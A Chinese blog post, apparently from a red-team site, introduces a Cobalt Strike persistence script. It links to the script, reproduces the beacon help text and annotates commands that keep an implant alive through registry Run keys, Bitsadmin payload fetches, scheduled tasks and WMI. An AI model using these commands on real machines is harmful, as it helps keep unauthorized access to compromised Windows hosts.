有大牛写了一个Cobalt Strike自启动脚本,加载persistence.cna 这个脚本,进行完相应的操作就可以了,不过有些时候目标的杀软会做一点我们不喜欢的事情,这个时候就GG了,但是不敢如何,我们还是测试一下这个脚本的使用吧。

其实这些全部都是基于系统自己的功能,所以就没有必要深究了,还是自己手动添加比较好,如何操作?请看:Windows自启动姿势20180226

脚本下载地址:
https://github.com/Cyri1s/cobalt-strike-persistence

beacon> help persistence
add or remove persistence capabilities to a beacon

Usage: persistence [Add | Remove] [method] [arguments]

Available methods:
    RegKeyRun <payload / key name>
    Bitsadmin <payload>
    SchTasks OnIdle [idle time] <payload / task name>
    SchTasks OnTime [Hourly | Daily | Weekly | Monthly] <payload / task name>
    *SchTasks OnStart <payload / task name>
    *SchTasks OnLogon <payload / task name>
    *WMI OnStart <payload / task name>
    *WMI Daily <payload / task name>

 * = method needs admin
[] = requireed argument
<> = optional argument
  1. persistence Add RegKeyRun artifact.exe //手动把exe上传到c:\users\public\目录下后,再执行这个命令,就会在注册表加入开机启动。
  2. persistence Add Bitsadmin "http://wwww.baidu.com/a" //此法是通过SchTasks做的开机启动,会在进入桌面后的几分钟后弹出一个CMD小窗口,大约0.2s后消失。
  3. persistence Add SchTasks OnIdle //在空闲的时候
  4. persistence Add SchTasks OnTime //在某个时刻
  5. SchTasks OnStart <payload / task name> //在启动的时候
  6. SchTasks OnLogon <payload / task name> //在用户登录的时候
  7. WMI OnStart <payload / task name>
  8. WMI Daily <payload / task name>

发表评论

电子邮件地址不会被公开。 必填项已用*标注